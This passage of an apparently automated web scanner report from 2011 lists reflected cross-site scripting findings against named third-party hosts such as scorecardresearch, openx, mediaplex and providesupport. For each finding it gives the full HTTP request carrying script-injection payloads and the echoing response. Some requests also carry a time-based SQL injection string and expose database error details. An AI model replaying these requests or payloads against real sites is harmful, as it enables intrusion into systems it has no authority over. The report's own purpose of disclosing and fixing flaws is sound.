COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"123174a196<script>alert(1)</script>3f29ade7707", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.31. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ff2cf<script>alert(1)</script>e9478be8b5 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856ff2cf<script>alert(1)</script>e9478be8b5&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:22 GMT
Date: Sat, 07 May 2011 22:38:22 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856ff2cf<script>alert(1)</script>e9478be8b5", c6:"", c10:"197334", c15:"", c16:"", r:""});



5.32. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 69f13<script>alert(1)</script>679de6de390 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=69f13<script>alert(1)</script>679de6de390&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:25 GMT
Date: Sat, 07 May 2011 22:38:25 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"69f13<script>alert(1)</script>679de6de390", c10:"197334", c15:"", c16:"", r:""});



5.33. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload b9c48<script>alert(1)</script>86ae8ab1018 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_60546910506b9c48<script>alert(1)</script>86ae8ab1018&pid=6a06418f-3099-5e06-6480-4371ef1e2544&s=728x90&f=0.49&cid=hhh728&url=http%3A%2F%2Fads.adonion.com%2Fserving%2Fshowbanner.php%3Fzone_id%3D45274%26user_id%3D17557%26site_id%3D15418%26size_id%3D1%26type_id%3D2%26flag%3D12%26b1%3D%25239cbce8%26b2%3D%2523000000%26b3%3D%2523FFFFFF%26b4%3D%2523000000%26ref%3Dhttp%253A%252F%252Fwww.kroogy.com%252Fsearch%252Famazon%253Fsearch%253Dmp3%2526type%253DAmazon%2526fl%253D0%26token%3DZGs2zNQg0yIgLSzR0fklWi0pMM7PIdh8fSoqz88i03z5alom3iXQfQ%26random%3D4474 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://creative.adonion.com/2_4092.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304557115

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=6f4ce7c4-85c4-4c44-be2c-721147673161; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304805367; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_60546910506b9c48<script>alert(1)</script>86ae8ab1018({"r":null});

5.34. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The value of the CompanyName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21525"><a>48f3eb756f8 was submitted in the CompanyName parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=21525"><a>48f3eb756f8&Question= HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: http://www.gotoassist.com/ph/lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dtsSession=SessionInfo%3D237919369%253A7FA06EBD517AE37; path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
<input type=text size=18 style="font: normal 10 verdana,arial,helvetica;width:156;height:17;" name="CompanyName" value="21525"><a>48f3eb756f8">
...[SNIP]...

5.35. http://dce.sapha.com/engine.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 8870a<script>alert(1)</script>5c8aaf5ef92 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%201--8870a<script>alert(1)</script>5c8aaf5ef92 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 494

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT 1--8870a<script>alert(1)</script>5c8aaf5ef92'<br>
...[SNIP]...

5.36. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload acfaf<script>alert(1)</script>dffcf9b8718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801-- HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 502

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801--'<br>
...[SNIP]...

5.37. http://depot.activalive.com/app/deployment.php [d[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload 9e6c5<script>alert(1)</script>2ac58b1cb32 was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=5930&ptid=5930-13937bf0e-a621-46f8-934f-34f158f4a901&stid=13937bf0e-a621-46f8-934f-34f158f4a901&oref=Direct&chat=null&r=0.5038613956421614&d[]=52219e6c5<script>alert(1)</script>2ac58b1cb32&b[]=14187 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 550
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5221);
_alc.__setStartDeptStatus(52219e6c5<script>alert(1)</script>2ac58b1cb32, false);
_alc.__setStartDeptStatus(5221, true);
delete _alc.__setStartDeptStatus;
_alc.setup(10596, 5930);
_alc.handleInvite = _alc.rollDownInvite;
_alc.handleInviteRejection = _alc.rollBackInvite;
_a
...[SNIP]...

5.38. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79937<script>alert(1)</script>4b3b2809a1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&79937<script>alert(1)</script>4b3b2809a1c=1 HTTP/1.1
Host: dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:11 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 79937<script>alert(1)</script>4b3b2809a1c

5.39. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/advancedaccess

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ce1e<script>alert(1)</script>41bc3fc6507 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http%3A//www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=pNpFk6ofuQKf

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:14 GMT
Content-Length: 545

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http://www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf
</pre>
...[SNIP]...

5.40. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce53d<script>alert(1)</script>bdd2d651cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:39:59 GMT
Content-Length: 574

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- =====================
...[SNIP]...

5.41. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f0a6<a>a8f8fbe4fcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:01 GMT
Content-Length: 552

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- ===========================================
...[SNIP]...

5.42. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edc80'%3balert(1)//d5cd4bf1dc7 was submitted in the mpck parameter. This input was echoed as edc80';alert(1)//d5cd4bf1dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014edc80'%3balert(1)//d5cd4bf1dc7&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:18 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4867
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
href="http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-68?pid=67732&bid=2606&mpt=572011105140PM4014edc80';alert(1)//d5cd4bf1dc7" target="_blank">
...[SNIP]...

5.43. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dd6"-alert(1)-"2b8a1c2260d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7dd6"-alert(1)-"2b8a1c2260d&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:16 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4861
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7dd6"-alert(1)-"2b8a1c2260d");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014d7d
...[SNIP]...

5.44. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fccc'%3balert(1)//880f559a92c was submitted in the mpvc parameter. This input was echoed as 1fccc';alert(1)//880f559a92c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=1fccc'%3balert(1)//880f559a92c HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:24 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4863
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=1fccc';alert(1)//880f559a92chttp://adfarm.mediaplex.com/ad/ck/15368-110724-22624-68?pid=67732&bid=2606&mpt=572011105140PM4014" target="_blank">
...[SNIP]...

5.45. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65257"%3balert(1)//921777b93b0 was submitted in the mpvc parameter. This input was echoed as 65257";alert(1)//921777b93b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

